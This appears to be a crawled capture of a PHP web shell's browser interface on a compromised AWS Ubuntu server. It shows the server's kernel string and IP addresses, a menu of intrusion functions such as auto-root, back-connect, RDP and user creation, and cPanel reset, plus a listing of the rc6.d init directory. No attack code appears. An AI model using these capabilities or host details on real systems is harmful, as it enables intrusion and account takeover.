Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.147.8.67
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
snap /
core /
16928 /
etc /
rc6.d /
[ HOME SHELL ]
Name
Size
Permission
Action
K01cgmanager
3.48
KB
-rwxr-xr-x
K01cgproxy
3.28
KB
-rwxr-xr-x
K01resolvconf
4.05
KB
-rwxr-xr-x
K01ubuntu-fan
1.2
KB
-rwxr-xr-x
K01urandom
3.04
KB
-rwxr-xr-x
K02sendsigs
3.83
KB
-rwxr-xr-x
K03rsyslog
2.73
KB
-rwxr-xr-x
K04hwclock.sh
3.72
KB
-rwxr-xr-x
K04umountnfs.sh
2.15
KB
-rwxr-xr-x
K05networking
4.66
KB
-rwxr-xr-x
K06umountfs
2.67
KB
-rwxr-xr-x
K07umountroot
1.83
KB
-rwxr-xr-x
K08reboot
661
B
-rwxr-xr-x
README
351
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README
The scripts in this directory are executed once when entering runlevel 6. The scripts are all symbolic links whose targets are located in /etc/init.d/ . Generally it is not necessary to alter the scripts in this directory. Their purpose is to stop all services and to make the system ready for reboot. For more information see /etc/init.d/README.
Close